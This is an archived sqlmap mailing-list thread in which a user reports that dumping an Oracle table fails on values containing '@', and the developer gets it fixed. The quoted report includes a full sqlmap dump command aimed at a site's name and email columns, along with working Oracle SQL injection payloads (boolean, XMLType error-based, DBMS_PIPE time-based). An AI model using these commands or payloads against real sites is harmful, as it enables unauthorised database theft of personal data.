Re: [sqlmap-users] problem with oracle dump if column contents contain @
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] problem with oracle dump if column contents contain @
|
From: This L. <thi...@ho...> - 2011-07-23 06:58:44
|
Fixed. :) Thank you. > Date: Sat, 23 Jul 2011 08:02:19 +0200 > Subject: Re: [sqlmap-users] problem with oracle dump if column contents contain @ > From: mir...@gm... > To: thi...@ho... > CC: sql...@li... > > hi 'Little Piggy'. > > could you please update and retry? > > kr > > On Sat, Jul 23, 2011 at 3:45 AM, This LittlePiggy > <thi...@ho...> wrote: > > When using sqlmap/1.0-dev (r4277) > > ./sqlmap.py -v 4 -u > > 'http://www.example.com/comunity/artickles_details.php?id=190' -D BELCH -T > > FELATORS -C FNAME,EMAIL --dump > > banner: 'Oracle Database 11g Release 11.2.0.1.0 - 64bit Production' > > Place: GET > > Parameter: id > > Type: boolean-based blind > > Title: AND boolean-based blind - WHERE or HAVING clause > > Payload: id=190 AND 9035=9035 > > Type: error-based > > Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) > > Payload: id=190 AND 4286=(SELECT > > UPPER(XMLType(CHR(60)||CHR(58)||CHR(103)||CHR(111)||CHR(114)||CHR(58)||(SELECT > > (CASE WHEN (4286=4286) THEN 1 ELSE 0 END) FROM > > DUAL)||CHR(58)||CHR(122)||CHR(113)||CHR(99)||CHR(58)||CHR(62))) FROM DUAL) > > Type: AND/OR time-based blind > > Title: Oracle AND time-based blind > > Payload: id=190 AND > > 6019=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(88)||CHR(82)||CHR(115),5) > > --- > > [21:18:48] [INFO] the back-end DBMS is Oracle > > web server operating system: Linux CentOS 5 > > web application technology: Apache 2.2.3, PHP 5.3.5 > > back-end DBMS: Oracle > > > > If any columns selected contain an @, the dump fails with > > [21:42:10] [WARNING] possible server trimmed output detected (due to its > > length): part-of-field-before-at-sign" (not a Name) > > Error at line 1 > > ORA-06512: at "SYS.XMLTYPE", line 310 > > ORA-06512: at line 1 in <b>/var/www/html/inc/details_inc.php > > > > suggestions? > > > > ------------------------------------------------------------------------------ > > Storage Efficiency Calculator > > This modeling tool is based on patent-pending intellectual property that > > has been used successfully in hundreds of IBM storage optimization engage- > > ments, worldwide. Store less, Store more with what you own, Move data to > > the right place. Try It Now! > > http://www.accelacomm.com/jaw/sfnl/114/51427378/ > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > -- > Miroslav Stampar (@stamparm) > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B |
